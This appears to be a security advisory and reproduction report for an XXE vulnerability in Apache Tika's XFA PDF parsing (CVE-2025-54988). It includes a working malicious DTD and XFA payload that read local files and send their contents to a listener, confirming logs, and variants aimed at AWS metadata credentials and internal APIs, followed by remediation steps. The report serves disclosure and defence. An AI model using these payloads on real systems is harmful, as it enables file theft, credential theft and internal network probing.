- Product / Component: Apache Tika (
tika-core+tika-parser-pdf-module) - XFA PDF Parser - Impact: Unauthenticated attacker can exfiltrate arbitrary local files from systems parsing malicious PDFs. Data is sent to attacker-controlled servers via HTTP requests, enabling "blind" XXE exploitation where parser output is not visible. Additionally enables SSRF to internal services (cloud metadata endpoints, internal APIs).
- Severity: High (CVSS: 9.8 Critical per GHSA)
- Affected Versions:
tika-core1.13 - 3.2.1,tika-parser-pdf-module2.0.0 - 3.2.1 - Fixed: Apache Tika 3.2.2 (commit bfee6d5)
- Reproduction Status: CONFIRMED (Tika 3.2.1, OpenJDK 21.0.9, Ubuntu 22.04)
- Identifiers:
- CVE-2025-54988
- CVE-2025-66516
- GHSA-f58c-gq56-vjjf
Apache Tika's PDF parser delegates XFA (XML Forms Architecture) processing to Xerces XML parser with external entity resolution enabled. When processing a malicious PDF containing an XFA form with a DOCTYPE declaration that references an external DTD:
- Tika parses the PDF and encounters the embedded XFA XML
- Xerces resolves the external DTD from an attacker-controlled server
- The DTD defines parameter entities that:
- Read local files via
file://URIs (e.g.,/etc/hostname,/etc/passwd) - Construct a URL containing the file contents as a parameter
- Read local files via
- Xerces makes an outbound HTTP request to
http://attacker/?data=<file_contents> - The attacker receives the exfiltrated data in their server logs
Key vulnerability characteristics:
- Works in "blind" scenarios where parser output isn't returned to the attacker
- Silent exfiltration via network - no visible indication in parser output
- Can target any file readable by the Tika process
- Enables SSRF to internal services (AWS metadata at 169.254.169.254, internal APIs)
The fix in Tika 3.2.2 disables external parameter entity resolution for XFA parsing, preventing the DTD fetch and subsequent data exfiltration.
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ Malicious PDF │────▶│ Apache Tika │────▶│ Attacker Server │
│ with XFA + DTD │ │ 3.2.1 │ │ (port 8888) │
│ reference │ │ │ │ │
└─────────────────┘ └──────────────────┘ └─────────────────┘
│ │
│ 1. GET /evil.dtd │
│───────────────────────▶│
│ │
│ 2. DTD with entities │
│◀───────────────────────│
│ │
│ 3. Read /etc/hostname │
│ (local file) │
│ │
│ 4. GET /?data=<hostname>│
│───────────────────────▶│
│ │
│ EXFILTRATED! │
- Java 17+ (tested with OpenJDK 21.0.9)
- Python 3.x (for HTTP server and PoC generator)
- Git
- Network connectivity (or localhost testing)
# Run the reproduction script
./repro/reproduction_steps.shThe script:
- Clones the public PoC from https://github.com/mgthuramoemyint/POC-CVE-2025-54988
- Downloads
tika-app-3.2.1.jarfrom Maven Central - Generates malicious PDF (
malicious_oob.pdf) with embedded XFA and external DTD reference - Creates
evil.dtdthat extracts/etc/hostnameand sends it to localhost:8888 - Starts Python HTTP server on port 8888 to serve DTD and capture exfiltrated data
- Executes Tika against the malicious PDF
- Verifies the exfiltration by checking server logs
- Create the malicious DTD (
evil.dtd):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8888/?data=%file;'>">
%all;- Create PDF with XFA containing:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8888/evil.dtd">
%dtd;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">&send;</xdp:xdp>- Start listener:
python3 -m http.server 8888 --directory /path/to/dtd/- Parse with Tika:
java -jar tika-app-3.2.1.jar malicious.pdf- Check listener logs for exfiltrated data
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /evil.dtd HTTP/1.1" 200 -
127.0.0.1 - - [09/Dec/2025 15:25:57] "GET /?data=lima-pruva-ghsa-f58c-gq56-vjjf-apache-tika-xxe-oob-e-20251209134317 HTTP/1.1" 200 -
Analysis:
- First request: Tika fetched
evil.dtdfrom the attacker server - Second request: Tika sent the contents of
/etc/hostname(the VM hostname) in thedataparameter - Both requests occurred within the same second, demonstrating immediate exploitation
- Java: OpenJDK 21.0.9
- Python: 3.10.12
- OS: Ubuntu 22.04 (Lima VM)
- Tika Version: 3.2.1 (vulnerable)
- Malicious PDF:
artifacts/tika-oob-runs/run-*/payload/malicious_oob.pdf - Evil DTD:
artifacts/tika-oob-runs/run-*/payload/evil.dtd - Listener logs:
logs/listener_*.log - Tika output:
logs/tika_*.log - PoC source:
artifacts/POC-CVE-2025-54988/
An organization uses Tika to extract text/metadata from user-uploaded PDFs. An attacker uploads a malicious PDF to exfiltrate:
- AWS credentials from
~/.aws/credentials - Environment variables containing secrets
- Application configuration files
- Database connection strings
Attacker crafts DTD to access cloud metadata:
<!ENTITY % file SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">Enables credential theft from AWS, GCP, Azure instances running Tika.
Use XXE to probe internal services:
<!ENTITY % file SYSTEM "http://internal-api:8080/health">Map internal infrastructure and identify additional attack surfaces.
-
Upgrade to Tika 3.2.2 or later
<dependency> <groupId>org.apache.tika</groupId> <artifactId>tika-core</artifactId> <version>3.2.2</version> </dependency>
-
If upgrade is not immediately possible:
- Disable XFA parsing entirely via
tika-config.xml - Implement network egress filtering to block unexpected outbound requests
- Run Tika in a sandboxed environment with no network access
- Disable XFA parsing entirely via
-
Network Controls:
- Block outbound HTTP/HTTPS from document processing services
- Implement allow-list for necessary external resources
- Monitor for unusual DNS queries or outbound connections
-
File System Isolation:
- Run Tika with minimal file system permissions
- Use containerization with read-only root filesystem
- Mount only necessary directories
-
Input Validation:
- Scan uploaded PDFs for suspicious XML structures before processing
- Implement file size limits to prevent resource exhaustion
- Consider using a separate, isolated service for PDF processing
-
Monitoring:
- Alert on Tika processes making unexpected network connections
- Log all outbound requests from document processing infrastructure
- Monitor for access to sensitive files
- GHSA-f58c-gq56-vjjf - GitHub Security Advisory
- CVE-2025-54988 - CVE Record
- CVE-2025-66516 - NVD Entry
- Apache Tika Security - Official Security Page
- Fix Commit bfee6d5 - Patch Details
- POC-CVE-2025-54988 - Public PoC
- CWE-611: Improper Restriction of XML External Entity Reference
- CWE-918: Server-Side Request Forgery (SSRF)
- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Report Generated: 2025-12-09 Reproduction Status: CONFIRMED Idempotency Verified: Yes (multiple successful runs)